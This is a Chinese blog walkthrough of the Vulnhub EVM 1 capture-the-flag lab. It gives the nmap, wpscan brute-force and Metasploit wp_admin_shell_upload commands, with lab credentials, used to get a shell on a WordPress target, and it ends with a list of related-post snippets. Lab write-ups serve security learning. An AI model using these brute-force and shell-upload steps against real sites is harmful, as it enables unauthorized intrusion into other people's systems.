Vulnhub:EVM 1靶机

已于 2023-06-07 23:26:34 修改
阅读量154 收藏
点赞数
文章标签: 安全 web安全 网络安全
于 2023-04-24 19:39:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43884092/article/details/130350293
版权
文章描述了一次针对192.168.111.131靶机的渗透测试过程,首先使用nmap的http-enum脚本发现目标是WordPress站点,接着通过wpscan枚举用户并找到用户名c0rrupt3d_brain,然后使用密码字典爆破得到密码24992499。利用这些信息,通过msf的wp_admin_shell_upload模块成功获取shell。最后,在/home/root3r/.root_password_ssh.txt文件中找到root用户的密码willy26。
摘要由CSDN通过智能技术生成

kali:192.168.111.111

靶机:192.168.111.131

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.131

使用nmap的http-enum脚本扫描出目标为wordpress站点,使用wpscan枚举目标用户,得到用户:c0rrupt3d_brain

wpscan --url http://192.168.111.131/wordpress/ -e u

用收集到的用户爆破密码,得到密码:24992499

wpscan --url http://192.168.111.131/wordpress/ -U c0rrupt3d_brain -P /usr/share/wordlists/rockyou.txt

使用msf的exploit/unix/webapp/wp_admin_shell_upload模块拿shell

msfdb run
use exploit/unix/webapp/wp_admin_shell_upload
set rhosts 192.168.111.131
set username c0rrupt3d_brain
set password 24992499
set targeturi /wordpress

提权

在/home/root3r/.root_password_ssh.txt发现root用户的密码:willy26

flag

ctostm
关注
vulnhub靶机EVM
timesleep的博客
11-30 784
拿到我们的靶机我们首先扫描并确定靶机IP 发现这个靶机为153然后使用nmap扫描 看到靶机有80端口然后先访问一下 看到只是一个apache界面使用扫描一下目录 我们发现靶机有wordpress框架,然后使用wpscan工具扫描这个框架. wpscan --url http://192.168.34.153/wordpress -e ap -e at -e u 我们看到了一个用户c...
vulnhub靶机EVM渗透笔记
liver100day的博客
08-02 1223
文章标题1.环境搭建2.信息收集2.1 主机发现3.漏洞利用4.提权5.总结 1.环境搭建 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.139 靶机EVM IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/evm-1,391/ 2.信息收集 2.1 主机发现 我们要进行渗透,首先得知道目标靶机的IP地址,否则将无从做起 arp-scan -l 3.漏洞利用 4.提权 5.总结 ...
EVM靶机
最新发布
weixin_74188994的博客
05-11 811
通过VirtualBox食用。
vulnhub EVM: 1
箭雨镜屋
07-07 852
渗透思路:nmap扫描----gobuster扫描网站目录----wpscan枚举wordpress用户名并爆破密码----Metasploit获取靶机shell----找到记录root密码的文件并提权
EVM靶机 测试
Keepb1ue的博客
03-17 3209
靶机运行环境: Oracle VM VirtualBox 靶机ip:192.168.56.103 所用工具: Nmap Wpscan Dirb AntSword … 开始测试: 我们先进行信息收集,扫描下它的端口服务 可以看到该靶机总共开放了7个端口。 发现它的ssh服务是开放的,并开放了一个http服务 试着去访问192.168.56.103,默认端口为80 在主页这里给出了提示 在这里我...
evm_llvm:EVM LLVM项目的官方仓库
01-31
如今,在EVM上处理智能合约有很多限制。 由于EVM平台是一个非常特定于区块链的执行环境,因此编程语言,性能,成本,分析工具都受到限制。 它与我们的日常编译器有很大不同。 这是一台堆叠机; 资源有限; 它没有堆...
EVM: 1-Walkthrough【VulnHub靶场】渗透测试实战系列2
重新启程
12-03 567
靶场地址:EVM: 1 这个靶机比较特殊的地方,不是用dhcp生成地址,必须用host网络,靶机的地址必须为192.168.56.103。 至于怎么做到,小伙伴自行脑补,有助于手臂锻炼。呵呵! 搞定上面的准备工作之后,拿出kali,先扫一下地址和端口: 用enum4linux对smb扫描了一下,没有什么特别有用的信息 就直接打开80web看看情况,扫描了一下目录,发现有word...
嘎嘎作响:EVM二进制静态分析
02-05
Rattle是一个EVM二进制静态分析框架,旨在处理已部署的智能合约。 Rattle获取EVM字节字符串,使用流敏感分析来恢复原始控制流图,将控制流图提升为SSA /无限寄存器形式,并优化SSA –删除DUP,SWAP,PUSH和POP。 从...
EVM靶机渗透实战-vuluhub系列(八)
PANDA墨森的博客
07-07 790
这是vulnhub靶机系列文章的第八篇,本次主要知识点为:利用msf登陆wordpress后台getshell,本机信息收集的妙处 Ps:用vm环境搭建的时候会获取不到ip,可换成vutrlbox或者自行百度解决,也可以联系我(如有需要的话) 靶机下载地址:https://www.vulnhub.com/entry/evm-1,391/ 原文链接:https://www.cnblogs.com/PANDA-Mosen/p/13209803.html #001 实验环境(nat模式) 攻击机:.
VulnHub系列』EVM: 1-Walkthrough
ins1ght的博客
11-28 701
靶机发布日期:2019年11月2日,难度:初级。这个靶机本身没有什么难度,容易卡住的地方也就是配置靶机的网络了。PS:以后的文章可能更加偏重于思路的分享,可能不再像以前一样写的那么细节,但这不代表以后都不用心了,只能说顺应大趋势吧,该提到的点也都会提到。有什么问题可以私下交流,感谢!!!
Vulnhub-靶机-EVM 1
qq_43264813的博客
02-02 315
Vulnhub靶机—Kioptrix: Level 1 (#1) 本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关 地址:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 文章目录Vulnhub靶机—Kioptrix: Level 1 (#1)一、信息收集二、漏洞利用三、Flag 一、信息收集 【步骤一】使用nmap确定目标靶机地址,对目标靶机进行全端口扫描: 【命令】nmap
vulnhub靶场之EVM
qq_34613171的博客
02-11 312
难度:初级 这是超级友好的盒子,适合初学者 使用VirtualBox可能比使用VMware更好 http://192.168.56.103/ 扫目录发现wordpress/。 使用wpscan进行扫描 wpscan --url http://192.168.0.119/wordpress/ -e at -e ap -e u wpscan枚举(-e)在wordpress网站上安装的所有主题(at...
VulnHub 靶机学习No.1-EVM
gh0stf1re的博客
09-27 291
本篇博客的主要内容VulnHub 靶机学习No.1-EVM靶机运行说明信息收集反弹shell提权知识点总结:参考链接: VulnHub 靶机学习No.1-EVM 靶机运行说明 靶机难度: 目标: 攻击机:kali linux,ip地址:192.168.56.102 靶机EVM,IP地址:192.168.56.103 信息收集 仅开启kali 和靶机,使用nmap扫描kali所在的C段 nmap 192.168.56.102/24 扫描结果: root@kali:~# nmap 192.168.56.
EVM Instruction Set
weixin_34198583的博客
04-21 124
2019独角兽企业重金招聘Python工程师标准>>> ...
vulnhub - EVM
weixin_46164380的博客
03-27 215
EVM靶机 网段扫描:arp-scan -l 扫描靶机开启的服务 开启的服务比较多,有ssh服务、有http服务;还有三个邮件协议110、139、445; Ps:samba可以进行枚举 共享 enum4linux -S 192.168.56.103 遍历目录发现:info.php 并且还是wordpress框架 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ctK...
一图看懂EVM
Tooth_Fairy的博客
05-17 1961
可以看到EVM可以说是一个状态机, 外界的调用者信息(TX CALLER 图上部), 外界的状态(区块链状态 图左部)都会输入EVM, 根据EVM存储的智能合约代码 + 全局的链信息 + 调用者信息 + 调用者输入参数(依据合约opcode执行bytecode, 执行过程中会消耗gas) = 输出信息(依据bytecode执行, bytecode的判断条件, gas是否够用等). accou...
[Vulnhub靶机] DriftingBlues: 2
haosha。的博客
02-03 2251
[Vulnhub靶机] DriftingBlues: 2靶机渗透思路及方法(个人分享)
vulnhub渗透系列之EVM (内含许多疑问!!!)
来到了学渣的博客
01-28 1846
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 实验过程总结 1.这个靶机做下来,的确是比较好入手比较简单,但不建议去做,因为一些网络配置的问题,的确 挺复杂的,不知道如何解决,但如果解决了这个问题,那这个靶机还是很不错的。(见未解决的疑问 2.首先还是探测存活的靶机和开放的端口,虽然开放了139、44...
深入了解以太坊虚拟机第4部分——ABI编码外部方法调用的方式
omnispace的博客
03-25 2237
本文由币乎社区(bihu.com)内容支持计划赞助。在本系列的上一篇文章中我们看到了Solidity是如何在EVM存储器中表示复杂数据结构的。但是如果无法交互,数据就是没有意义的。智能合约就是数据和外界的中间体。在这篇文章中我们将会看到Solidity和EVM可以让外部程序来调用合约的方法并改变它的状态。“外部程序”不限于DApp/JavaScript。任何可以使用HTTP RPC与以太坊节点通信...
VSA计量研究:EVM指标与QPSK信号分析
公式(1)给出了传统上用于计算参考信号幅度的方法,其中[pic]表示第i个码片的抽样值。然而,当考虑幅度和相位误差[pic]和[pic]时(如图2所示),EVM与参考信号幅度有直接关系。理想情况下,应选择参考信号幅度使得...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值